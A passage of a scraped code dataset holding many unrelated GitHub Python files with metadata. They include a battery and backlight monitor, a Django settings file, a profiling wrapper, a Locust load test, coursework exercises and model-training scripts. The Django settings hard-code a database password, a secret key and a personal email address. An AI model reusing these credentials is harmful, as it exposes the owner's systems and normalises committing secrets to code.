BatteryInfo:\n def __init__(self):\n # 1 - AC . 0 - battery\n self.mode = 1\n self.capacity = 100\n self.hours_remain = 2\n self.minutes_remain = 2\n self.brightness_at_start = 100\n self.brightness_in_powersafe_mode = int(self.brightness_at_start / 2)\n self.brightness = 100\n self.get_brightness_at_start()\n # in seconds\n self.dim_time = 5\n\n def get_power_type(self):\n uevent = open(\"/sys/class/power_supply/AC/uevent\")\n online_string = uevent.read()\n self.mode = int(online_string[-2:])\n if self.mode == 1:\n text.insert(INSERT, \"AC mode\")\n text.insert(INSERT, '\\n')\n else:\n text.insert(INSERT, \"Battery mode\")\n text.insert(INSERT, '\\n')\n uevent.close()\n\n def get_capacity(self):\n capacity = open(\"/sys/class/power_supply/BAT0/capacity\")\n self.capacity = int(capacity.read())\n text.insert(INSERT, \"Capacity: \" + str(self.capacity) + \"%\")\n text.insert(INSERT, '\\n')\n capacity.close()\n\n def get_estimated_time(self):\n if self.mode == 0:\n charge_now_file = open(\"/sys/class/power_supply/BAT0/charge_now\")\n current_now_file = open(\"/sys/class/power_supply/BAT0/current_now\")\n\n charge_now_int = int(charge_now_file.read())\n current_now_int = int(current_now_file.read())\n\n if current_now_int != 0:\n time_remain = divmod(charge_now_int, current_now_int)\n self.hours_remain = time_remain[0]\n self.minutes_remain = int((charge_now_int / current_now_int - self.hours_remain) * 60)\n text.insert(INSERT, \"Time to full discharge: \" + \"0\" + \":\" + str(self.minutes_remain))\n text.insert(INSERT, '\\n')\n\n charge_now_file.close()\n current_now_file.close()\n\n def get_brightness_at_start(self):\n brightness = open(\"/sys/class/backlight/nv_backlight/brightness\")\n self.brightness_at_start = int(brightness.read())\n self.brightness = self.brightness_at_start\n brightness.close()\n\n # you need rights to write to brightness file\n def set_powersafe_brightness(self):\n brightness = open(\"/sys/class/backlight/nv_backlight/brightness\", \"w\")\n brightness.write(str(self.brightness_in_powersafe_mode))\n self.brightness = self.brightness_in_powersafe_mode\n #brightness.close()\n\n def set_original_brightness(self):\n os.system(\"xset dpms force on\")\n brightness = open(\"/sys/class/backlight/nv_backlight/brightness\", \"w\")\n brightness.write(str(self.brightness_at_start))\n self.brightness = self.brightness_at_start\n brightness.close()\n\ntop = Tk()\ntext = Text(top)\nfield = Entry()\ntext.pack()\nfield.pack()\ninfo = BatteryInfo()\ndata_update_time = 3\ndim_time = 5\ndev = InputDevice('/dev/input/event0')\ndev2 = InputDevice('/dev/input/event6')\n\ndef signal_handler(signal, frame):\n text.insert(INSERT, 'Backlight settings were restored')\n text.insert(INSERT, '\\n')\n info.set_original_brightness()\n dev.close()\n dev2.close()\n sys.exit(0)\n\ndef loop(count_time, dim_flag, dim_start_time, start_time, event_flag):\n keyboard_event = dev.read_one()\n mouse_event = dev2.read_one()\n\n if field.get() != \"\":\n\n dim_time = int(field.get())\n\n if keyboard_event is not None and mouse_event is not None and event_flag is False:\n dim_start_time = time.time()\n\n # turn off dim\n if info.mode == 0 and info.brightness != info.brightness_at_start and dim_flag is True:\n info.set_original_brightness()\n dim_start_time = time.time()\n dim_flag = False\n\n # change brightness according to the current battery mode\n if info.mode == 1 and info.brightness != info.brightness_at_start:\n info.set_original_brightness()\n\n if info.mode == 0 and info.brightness != info.brightness_in_powersafe_mode \\\n and dim_start_time + dim_time < time.time() and dim_flag is False:\n os.system(\"xset dpms force off\")\n info.set_powersafe_brightness()\n dim_start_time = time.time()\n dim_flag = True\n\n if time.time() > count_time + data_update_time:\n count_time = time.time()\n info.get_power_type()\n info.get_capacity()\n info.get_estimated_time()\n\n top.after(100, loop, count_time, dim_flag, dim_start_time, start_time, event_flag)\n\n\n\nif __name__ == '__main__':\n text.insert(INSERT, dev2)\n text.insert(INSERT, '\\n')\n\n signal.signal(signal.SIGINT, signal_handler)\n start_time = time.time()\n dim_start_time = time.time()\n count_time = time.time() - data_update_time\n dim_flag = False\n event_flag = False\n\n loop(count_time, dim_flag, dim_start_time, start_time, event_flag)\n top.mainloop()\n\n\n","repo_name":"AnastasiaAndruhovich550503/Battery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71540385533","text":"import pickle\nimport numpy\n\n\ndef load_word_embeddings(path):\n words, embeddings = pickle.load(open(path, 'rb'), encoding='latin1')\n print(\"Emebddings shape is {}\".format(embeddings.shape))\n return words, embeddings\n\n\ndef load_treebanks(path):\n data = None\n with open(path, 'r') as f:\n data = f.read().split('\\n')\n\n return data\n\n\ndef train_test_split(data, train_size, dev_size, test_size):\n n = len(data)\n n_train = int(n*train_size )\n n_dev = int(n*(train_size + dev_size))\n\n train_data = data[:n_train]\n dev_data = data[n_train:n_dev]\n test_data = data[n_dev:]\n\n return train_data, dev_data, test_data\n","repo_name":"gabrielbarcik/CYKparser","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11452130913","text":"from aocd import data, submit\n\n\ndef chunks(L, n):\n \"\"\" Yield successive n-sized chunks from L.\n \"\"\"\n for i in range(0, len(L), n):\n yield L[i:i+n]\n\n\ndef get_num_count(data, num):\n return len(list(filter(lambda x: x == num, data)))\n\n\nif __name__ == '__main__':\n dimx = 25\n dimy = 6\n\n layer_pixels = dimx * dimy\n layers = [chunk for chunk in chunks(data, layer_pixels)]\n\n min_count = float('inf')\n min_layer = None\n for layer in layers:\n zero_count = get_num_count(layer, '0')\n if zero_count < min_count:\n min_count = zero_count\n min_layer = layer\n\n # print(f'{min_count} {get_num_count(min_layer, \"1\") * get_num_count(min_layer, \"2\")}')\n submit(get_num_count(min_layer, \"1\") * get_num_count(min_layer, \"2\"))","repo_name":"tomsajan/aoc","sub_path":"2019/advent_2019_08a.py","file_name":"advent_2019_08a.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39151324661","text":"import os\nimport os.path\nimport socket\n\nPROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])\nMY_IP = socket.gethostbyaddr(socket.gethostname())[2][0]\nMY_HOSTNAME = socket.gethostbyaddr(socket.gethostname())[0]\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nif TEMPLATE_DEBUG == True:\n TEMPLATE_STRING_IF_INVALID = \"TEMPLATE_INVALID\"\n\nADMINS = (\n (\"Philipp Wollermann\", \"philipp@igowo.de\"),\n)\n\nMANAGERS = ADMINS\n\nDEFAULT_FROM_EMAIL = \"pysk@%s\" % (MY_HOSTNAME,)\nSERVER_EMAIL = DEFAULT_FROM_EMAIL\n\nDATABASE_ENGINE = 'postgresql_psycopg2' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = 'pysk' # Or path to database file if using sqlite3.\nDATABASE_USER = 'pysk' # Not used with sqlite3.\nDATABASE_PASSWORD = 'z62VUW2m59Y69u99'\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\nTIME_ZONE = 'Europe/Berlin'\nLANGUAGE_CODE = 'de-de'\n\n_ = lambda s: s\n\nLANGUAGES = (\n ('de', _('German')),\n ('en', _('English')),\n)\n\nUSE_I18N = True\n\n# MEDIA_* settings are only relevant for uploaded files,\n# specifically fields of type FileField and ImageField!\nMEDIA_ROOT = os.path.join(PROJECT_PATH, '../uploads')\nMEDIA_URL = '/uploads/'\nSTATIC_ROOT = os.path.join(PROJECT_PATH, '../static')\nSTATIC_URL = '/static/'\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nSECRET_KEY = 'xgYRsDMhGsnjubsP1JwT9b6ux6teGVLedHEJywNtIsMQKxgK'\n\nSEND_BROKEN_LINK_EMAILS = not DEBUG\nAPPEND_SLASH = False\nPREPEND_WWW = False\nUSE_ETAGS = True\n\nROOT_URLCONF = 'pysk.urls'\n\nLOGIN_URL = \"/accounts/login/\"\nLOGIN_REDIRECT_URL = \"/admin/\"\nACCOUNT_ACTIVATION_DAYS = 14\n\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.RemoteUserMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.core.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.request\",\n)\n\nTEMPLATE_DIRS = (\n \"/opt/pysk/pysk/templates\",\n)\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.RemoteUserBackend',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'django.contrib.webdesign',\n 'django_extensions',\n 'pysk.app',\n 'pysk.vps',\n)\n","repo_name":"philwo/pysk","sub_path":"pysk/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"74124078972","text":"# Name: Intouch Srijumnong (Indy)\n# worked with JT\n\n# Constant\nG = 6.674e-11 # m^3 * kg^-1 * s^-2\nM = 5.974e24 # kg\nm = 7.348e22 # kg\nR = 3.844e8 # m\nw = 2.662e-6 # s^-1\n\n\n# a\n# Define Newton's universal law of gravitation as given\ndef G_law(r):\n return (G * M / r ** 2) - (G * m / (R - r) ** 2) - (w ** 2 * r)\n\n\n# b\n# Using secant method to solve for distance r\ndef secant():\n r1 = 3.0e4 # Starting values for secant method\n r2 = 3.0e6\n for x in range(20):\n r = r2 - G_law(r2) * (r2 - r1) / (G_law(r2) - G_law(r1))\n r1 = r2\n r2 = r\n return (r)\n\n\ndistance = secant()\nprint(\"L1 = \", distance, \"meters away from Earth\")\n","repo_name":"dgrin1/indy_hw","sub_path":"srijumnong_intouch_indy_hw8_6.16.py","file_name":"srijumnong_intouch_indy_hw8_6.16.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22962417642","text":"\"\"\"\nCRACKING THE CODING INTERVIEW\n3.3. Stacks of plates:\nImagine a (literal) stack of plates. If the stack gets too high,\nit might topple. Therefore, in real life, we would likely start\na new stack when the previous stack exceeds some threshold.\nImplement a data structure `SetOfStacks` that mimics this.\n`SetOfStacks` should be composed of several stacks and should create\na new stack once the previous one exceeds capacity.\n`SetOfStacks.push()` and `SetOfStacks.pop()` should behave identically\nto a single stack (that is, pop() should return the same values\nas it would if there were just a single stack).\n\"\"\"\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass StackNode:\n data: int\n next = None\n\n\nclass Stack:\n def __init__(self) -> None:\n self.top = None\n self.size = 0\n\n def push(self, data: int):\n node = StackNode(data)\n node.next = self.top\n self.top = node\n self.size += 1\n\n def peek(self) -> int:\n if self.top is None:\n return None\n return self.top.data\n\n def pop(self) -> int:\n if self.top is None:\n raise ValueError(\"The stack is empty, `pop()` failed\")\n data = self.top.data\n self.top = self.top.next\n self.size -= 1\n return data\n\n\n@dataclass\nclass SetOfStacks:\n capacity: int\n\n def __post_init__(self) -> None:\n self.stacks = []\n\n def push(self, data: int):\n if len(self.stacks) == 0 or self.stacks[-1].size >= self.capacity:\n self.stacks.append(Stack())\n\n self.stacks[-1].push(data)\n\n def peek(self):\n if len(self.stacks) == 0:\n return None\n return self.stacks[-1].peek()\n\n def pop(self) -> int:\n if len(self.stacks) == 0:\n raise ValueError(\"The stacks are empty\")\n\n data = self.stacks[-1].pop()\n\n if self.stacks[-1].size == 0:\n self.stacks.pop()\n\n return data\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"SET OF STACKS\")\n print(\"-\" * 60)\n\n stack = SetOfStacks(capacity=2)\n print(\"\\nPushing data into the SetOfStacks...\")\n for i in range(5, 10):\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n stack.push(i)\n print(f\"stack.push({i})\")\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n print(f\"stack.peek() = {stack.peek()}\", stack.peek() == i)\n print()\n\n print(\"\\nPopping data from the SetOfStacks...\")\n for i in range(4):\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n data = stack.pop()\n print(f\"stack.pop() = {data}\")\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n print(f\"stack.peek() = {stack.peek()}\", stack.peek() == 8 - i)\n print()\n\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n data = stack.pop()\n print(f\"stack.pop() = {data}\")\n print(f\"stack.peek() = {stack.peek()}\", stack.peek() is None)\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n","repo_name":"daalgi/algorithms","sub_path":"stacks/stack_of_plates.py","file_name":"stack_of_plates.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3140961714","text":"# BOJ 14470\nimport sys\n\nsi = sys.stdin.readline\n\ninit_temp = int(si())\ntarget_temp = int(si())\nf_time = int(si())\ndefrost_time = int(si())\nn_time = int(si())\ncur_temp = init_temp\ntime = 0\nfrozen = True\nwhile True:\n if target_temp == cur_temp:\n print(time)\n break\n if cur_temp < 0:\n cur_temp += 1\n time += f_time\n elif frozen and cur_temp == 0:\n frozen = False\n time += defrost_time\n else:\n cur_temp += 1\n time += n_time\n","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"BOJ/simulation_boj/micro_wave.py","file_name":"micro_wave.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27525663771","text":"class Rectangle:\n def __init__(self, width, height, color):\n self.width = width\n self.heigh = height\n self.color = color\n\n def getArea(self):\n area = self.width * self.heigh\n return area\n\n def getPerimeter(self):\n perimeter = (self.width + self.heigh)*2\n return perimeter\n\n#...\n\ncurtain = Rectangle (2, 3, 'verde')\nmonitor = Rectangle (1, 1, 'negro')\npool = Rectangle(15, 25, 'azul')\n\nprint('La cortina es de color {}.'.format(curtain.color))\nprint('El área del monitor es {} metros cuadrados.'.format(monitor.getArea()))\nx = pool.getPerimeter()\nprint (x)","repo_name":"roy-marquez/_IntroProg","sub_path":"s10/oop_rectangle.py","file_name":"oop_rectangle.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73800953212","text":"from functools import partial\nfrom typing import Any, Dict\n\nfrom django.db import models\n\nfrom factory import Factory\nfrom factory.base import StubObject\nfrom factory.faker import faker\n\n\nFAKER = faker.Faker()\n\n\n# https://github.com/FactoryBoy/factory_boy/issues/68#issuecomment-636452903\ndef generate_dict_factory(the_factory: Factory):\n def convert_dict_from_stub(stub: StubObject) -> Dict[str, Any]:\n stub_dict = stub.__dict__\n for key, value in stub_dict.items():\n if isinstance(value, StubObject):\n stub_dict[key] = convert_dict_from_stub(value)\n elif isinstance(value, models.Model): # Patch for user_id\n stub_dict[key] = value.pk\n return stub_dict\n\n def dict_factory(the_factory, **kwargs):\n stub = the_factory.stub(**kwargs)\n stub_dict = convert_dict_from_stub(stub)\n return stub_dict\n\n return partial(dict_factory, the_factory)\n","repo_name":"hectorcanto/fictional-demo-api","sub_path":"tests/factories/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42429310112","text":"import subprocess\nimport re\n\n\nclass MemrayProfile:\n\n def _call_cmd(self, cmd_string):\n \"\"\"\n Takes a string and runs it using the appropriate args for subprocess.run in this context.\n Returns the CompletedProcess object when the subprocess completes.\n \"\"\"\n print('Running cmd: ' + cmd_string)\n return subprocess.run(cmd_string.split(' '), capture_output=True, text=True)\n\n def _construct_run_cmd(self,\n python_file_to_profile,\n output_file=None,\n input_args=None,\n overwrite_file=True):\n \"\"\"\n Constructs the correct string to run memray given the passed args.\n\n Args:\n python_file_to_profile (str): Path to the python file you'd like memray to run and profile for you\n output_file (str): Path to the file you'd like memray to put it's results in (MUST end in '.bin')\n input_args (str): Space-separated string with the args you'd like passed to the file being profiled.\n e.g. if you want to call 'myfile.py arg1 arg2', you'd pass 'arg1 arg2' to this kwarg.\n overwrite_file (bool): Whether to overwrite the destination file if it exists. If you aren't\n passing an output_file arg, memray will automatially generate a new output filename so this\n arg won't matter.\n\n Returns:\n A strings, to be passed to _call_cmd.\n \"\"\"\n cmd = 'memray run'\n if overwrite_file:\n cmd += ' -f'\n if output_file:\n cmd += f' -o {output_file}'\n cmd += ' ' + str(python_file_to_profile)\n if input_args:\n cmd += ' ' + input_args\n return cmd\n\n def _parse_run_output(self, completed_process_object):\n \"\"\"\n Takes the results of a memray run (run via _call_cmd) and parses the stdout to get useful info.\n\n Args:\n completed_process_object (CompletedProcess): A subprocess.CompletedProcess obj. Must have\n been run with capture_output and text flags set to True.\n\n Returns:\n A tuple, with two values:\n - Whether or not memray successfully wrote results to the file\n - The output file string (mainly useful if you didn't pass a custom output file arg.)\n \"\"\"\n printout = completed_process_object.stdout\n print(\"===== Printing RUN output ================= \")\n print(printout)\n if type(printout) != str:\n print(\"Error: Must run command with subprocess.run([...], capture_output=True, text=True)\")\n output_file_match = re.search('Writing profile results into ([^\\n]+)', printout)\n output_file = None if not output_file_match else output_file_match.group(1)\n # successfully_wrote_results = 1 if re.search('[memray] Successfully generated profile results.', printout) else 0\n # if not successfully_wrote_results:\n # raise OSError('Error on memray run: ' + printout)\n return 1, output_file\n\n def _construct_flamegraph_cmd(self,\n memray_results_file,\n output_file=None):\n \"\"\"\n Constructs the correct string to make a memray flamegraph given the passed args.\n\n Args:\n memray_results_file (str): Path to the memray output file you'd like to make a flamegraph for\n output_file (str): Path to the file you'd like memray to put it's results in (MUST end in '.bin')\n\n Returns:\n A string, to be passed to _call_cmd.\n \"\"\"\n cmd = 'memray flamegraph -f'\n if output_file:\n cmd += f' -o {output_file}'\n cmd += ' ' + str(memray_results_file)\n return cmd\n\n def _parse_flamegraph_output(self, completed_process_object):\n \"\"\"\n Takes the results of a memray flamegraph (run via _call_cmd) and parses the stdout to get useful info.\n Args:\n completed_process_object (CompletedProcess): A subprocess.CompletedProcess obj. Must have\n been run with capture_output and text flags set to True.\n Returns:\n A tuple, with two values:\n - Whether or not memray successfully wrote results to the file\n - The output file string (mainly useful if you didn't pass a custom output file arg.)\n \"\"\"\n printout = completed_process_object.stdout\n print(\"===== Printing FLAMEGRAPH output ================= \")\n print(printout)\n if type(printout) != str:\n print(\"Error: Must run command with subprocess.run([...], capture_output=True, text=True)\")\n output_file_match = re.search('Wrote ([^\\n]+)', printout)\n output_file = None if not output_file_match else output_file_match.group(1)\n return output_file is not None, output_file\n\n def do_memray_run(self,\n python_file_to_profile,\n output_file=None,\n input_args=None):\n cmd_string = self._construct_run_cmd(python_file_to_profile,\n output_file=output_file,\n input_args=input_args)\n run_completed_process = self._call_cmd(cmd_string)\n successfully_wrote_results, run_output_file = self._parse_run_output(run_completed_process)\n if not successfully_wrote_results:\n raise Exception('Failed to profile program')\n print('Run complete. Runfile written to ' + run_output_file + '.')\n return successfully_wrote_results, run_output_file\n\n def do_memray_flamegraph(self, memray_results_file, output_file=None):\n cmd = self._construct_flamegraph_cmd(memray_results_file, output_file=output_file)\n print('Running flamegraph creation cmd: ' + cmd)\n completed_process = self._call_cmd(cmd)\n succeeded, output_file = self._parse_flamegraph_output(completed_process)\n if succeeded:\n print('Flamegraph generated for ' + memray_results_file + '. Flamegraph at ' + output_file)\n return succeeded, output_file\n\n def profile_and_render_flamegraph(self,\n python_file_to_profile,\n output_file_base=None,\n input_args=None):\n \"\"\"\n Takes a python program plus cmdline args to pass to it; does a memray profile run, creates a\n flamegraph of the result, and displays the graph.\n\n Usage\n =====\n mr = MemrayProfile()\n mr.profile_program_and_display_flamegraph('file_to_profile.py', input_args='--output outputfile.txt')\n \"\"\"\n if not output_file_base:\n output_file_base = python_file_to_profile.replace('.py', '') + '__' + re.sub('[-_ .]', '_', input_args)\n run_output_file = output_file_base + '_mr_output.bin'\n flamegraph_output_file = output_file_base + '_flamegraph.html'\n\n run_succeeded, _ = self.do_memray_run(python_file_to_profile,\n output_file=run_output_file,\n input_args=input_args)\n flamegraph_succeeded, flamegraph_output_file_parsed = self.do_memray_flamegraph(run_output_file,\n output_file=flamegraph_output_file)\n print('Program ' + python_file_to_profile + ' profiled!')\n print('Memray output at ' + run_output_file + '; flamegraph at ' + flamegraph_output_file)\n return (run_output_file, flamegraph_output_file)\n","repo_name":"qbatten/ezprof","sub_path":"src/ez_memprof/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28599285737","text":"from .base import *\nfrom rdkit.Chem import AllChem as chem\nfrom rdkit.DataStructs.cDataStructs import ExplicitBitVect\n\n\nPACKING_DIM = 64\n\nclass LSTM(EmbeddableModel):\n def __init__(self,\n device: torch.device,\n embedding_dim: int = 16,\n num_layer: int = 1,\n **kwargs\n ):\n super().__init__(device)\n self.embedding_dim = embedding_dim\n self.num_layer = num_layer\n\n self.seq = nn.LSTM(\n input_size=PACKING_DIM,\n hidden_size=embedding_dim,\n num_layers=num_layer,\n batch_first=True\n )\n self.fc = nn.Linear(\n in_features=embedding_dim,\n out_features=2\n )\n\n @staticmethod\n def decode_data(data: torch.Tensor, device: torch.device, **kwargs) -> torch.Tensor:\n return data.to(device)\n\n @staticmethod\n def process(mol: Mol, device: torch.device, **kwargs) -> torch.Tensor:\n bitvect = chem.RDKFingerprint(mol).ToBitString()\n vec = torch.tensor(list(\n map(float, bitvect)\n ), device=device)\n return vec.reshape(-1, PACKING_DIM)\n\n def embed(self, data: torch.Tensor) -> torch.Tensor:\n output, _ = self.seq(data[None, :])\n return output[0][-1]\n\n def forward(self, data):\n vec = self.embed(data)\n return self.fc(vec)\n","repo_name":"riteme/property-prediction","sub_path":"src/models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74751461371","text":"from locust import FastHttpUser, task\n\n\nclass BinanceUser(FastHttpUser):\n\n host = 'https://testnet.binance.vision'\n\n @task\n def get_depth_100(self):\n symbol = 'ETHBTC'\n limit = 100\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n\n @task\n def get_depth_500(self):\n symbol = 'ETHBTC'\n limit = 500\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n\n @task\n def get_depth_1000(self):\n symbol = 'ETHBTC'\n limit = 1000\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n\n @task\n def get_depth_5000(self):\n symbol = 'ETHBTC'\n limit = 5000\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n","repo_name":"lisitsas/konomic_test","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74121898812","text":"\"\"\"Define your architecture here.\"\"\"\nimport torch\nfrom torch import nn,optim\nimport argparse\nfrom models import SimpleNet,get_xception_based_model\n\nfrom utils import load_dataset, load_model\nimport torch.nn.functional as F\nfrom trainer import LoggingParameters, Trainer\n\n# class myNet(nn.Module):\n# \"\"\"Simple Convolutional and Fully Connect network.\"\"\"\n#\n# def __init__(self):\n# super().__init__()\n# self.conv1 = nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=2)\n# self.pool = nn.MaxPool2d(2, 2)\n# self.conv2 = nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=2)\n# self.conv3 = nn.Conv2d(16, 24, kernel_size=5, stride=1, padding=2)\n# self.fc1 = nn.Linear(24 * 26 * 26, 1024)\n# self.fc2 = nn.Linear(1024, 256)\n# self.fc3 = nn.Linear(256, 2)\n#\n# def forward(self, image):\n# \"\"\"Compute a forward pass.\"\"\"\n# first_conv_features = self.pool(F.relu(self.conv1(image)))\n# second_conv_features = self.pool(F.relu(self.conv2(\n# first_conv_features)))\n# third_conv_features = self.pool(F.relu(self.conv3(\n# second_conv_features)))\n# # flatten all dimensions except batch\n# flattened_features = torch.flatten(third_conv_features, 1)\n# fully_connected_first_out = F.relu(self.fc1(flattened_features))\n# fully_connected_second_out = F.relu(self.fc2(fully_connected_first_out))\n# two_way_output = self.fc3(fully_connected_second_out)\n# return two_way_output\n#\n# Arguments\ndef parse_args():\n \"\"\"Parse script arguments.\n\n Get training hyper-parameters such as: learning rate, momentum,\n batch size, number of training epochs and optimizer.\n Get training dataset and the model name.\n \"\"\"\n parser = argparse.ArgumentParser(description='Training models with Pytorch')\n parser.add_argument('--lr', default=0.001, type=float,\n help='learning rate')\n parser.add_argument('--momentum', default=0.9, type=float,\n help='SGD momentum')\n parser.add_argument('--batch_size', '-b', default=32, type=int,\n help='Training batch size')\n parser.add_argument('--epochs', '-e', default=4, type=int,\n help='Number of epochs to run')\n parser.add_argument('--optimizer', '-o', default='Adam', type=str,\n help='Optimization Algorithm')\n parser.add_argument('--dataset', '-d',\n default='fakes_dataset', type=str,\n help='Dataset: fakes_dataset or synthetic_dataset.')\n\n return parser.parse_args()\n\ndef train_my_competition_model():\n args = parse_args()\n # Data\n print(f'==> Preparing data: {args.dataset.replace(\"_\", \" \")}..')\n\n train_dataset = load_dataset(dataset_name=args.dataset,\n dataset_part='train')\n val_dataset = load_dataset(dataset_name=args.dataset, dataset_part='val')\n test_dataset = load_dataset(dataset_name=args.dataset, dataset_part='test')\n\n # Model\n model = get_xception_based_model()\n\n # Loss\n criterion = nn.CrossEntropyLoss()\n\n # Build optimizer\n optimizers = {\n 'SGD': lambda: optim.SGD(model.parameters(),\n lr=args.lr,\n momentum=args.momentum),\n 'Adam': lambda: optim.Adam(model.parameters(), lr=args.lr),\n }\n\n optimizer_name = args.optimizer\n if optimizer_name not in optimizers:\n raise ValueError(f'Invalid Optimizer name: {optimizer_name}')\n print(f\"Building optimizer {optimizer_name}...\")\n optimizer = optimizers[args.optimizer]()\n print(optimizer)\n\n optimizer_params = optimizer.param_groups[0].copy()\n # remove the parameter values from the optimizer parameters for a cleaner\n # log\n del optimizer_params['params']\n\n # Batch size\n batch_size = args.batch_size\n\n # Training Logging Parameters\n logging_parameters = LoggingParameters(model_name='myNet',\n dataset_name=args.dataset,\n optimizer_name=optimizer_name,\n optimizer_params=optimizer_params,)\n\n # Create an abstract trainer to train the model with the data and parameters\n # above:\n trainer = Trainer(model=model,\n optimizer=optimizer,\n criterion=criterion,\n batch_size=batch_size,\n train_dataset=train_dataset,\n validation_dataset=val_dataset,\n test_dataset=test_dataset)\n # Train, evaluate and test the model:\n trainer.run(epochs=args.epochs, logging_parameters=logging_parameters)\n\n\ndef my_competition_model():\n \"\"\"Override the model initialization here.\n\n Do not change the model load line.\n \"\"\"\n # initialize your model:\n model = get_xception_based_model()\n\n\n # load your model using exactly this line (don't change it):\n model.load_state_dict(torch.load('checkpoints/competition.pt')['model'])\n return model\n\nif __name__==\"__main__\":\n train_my_competition_model()\n\n","repo_name":"Moshey99/AuthenticImageDetection","sub_path":"competition_model.py","file_name":"competition_model.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"970365753","text":"from __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nimport proto # type: ignore\n\n\n__protobuf__ = proto.module(\n package=\"google.cloud.bigquery.storage.v1beta2\",\n manifest={\n \"ArrowSchema\",\n \"ArrowRecordBatch\",\n \"ArrowSerializationOptions\",\n },\n)\n\n\nclass ArrowSchema(proto.Message):\n r\"\"\"Arrow schema as specified in\n https://arrow.apache.org/docs/python/api/datatypes.html and\n serialized to bytes using IPC:\n\n https://arrow.apache.org/docs/format/Columnar.html#serialization-and-interprocess-communication-ipc\n\n See code samples on how this message can be deserialized.\n\n Attributes:\n serialized_schema (bytes):\n IPC serialized Arrow schema.\n \"\"\"\n\n serialized_schema: bytes = proto.Field(\n proto.BYTES,\n number=1,\n )\n\n\nclass ArrowRecordBatch(proto.Message):\n r\"\"\"Arrow RecordBatch.\n\n Attributes:\n serialized_record_batch (bytes):\n IPC-serialized Arrow RecordBatch.\n \"\"\"\n\n serialized_record_batch: bytes = proto.Field(\n proto.BYTES,\n number=1,\n )\n\n\nclass ArrowSerializationOptions(proto.Message):\n r\"\"\"Contains options specific to Arrow Serialization.\n\n Attributes:\n format_ (google.cloud.bigquery_storage_v1beta2.types.ArrowSerializationOptions.Format):\n The Arrow IPC format to use.\n \"\"\"\n\n class Format(proto.Enum):\n r\"\"\"The IPC format to use when serializing Arrow streams.\n\n Values:\n FORMAT_UNSPECIFIED (0):\n If unspecied the IPC format as of 0.15\n release will be used.\n ARROW_0_14 (1):\n Use the legacy IPC message format as of\n Apache Arrow Release 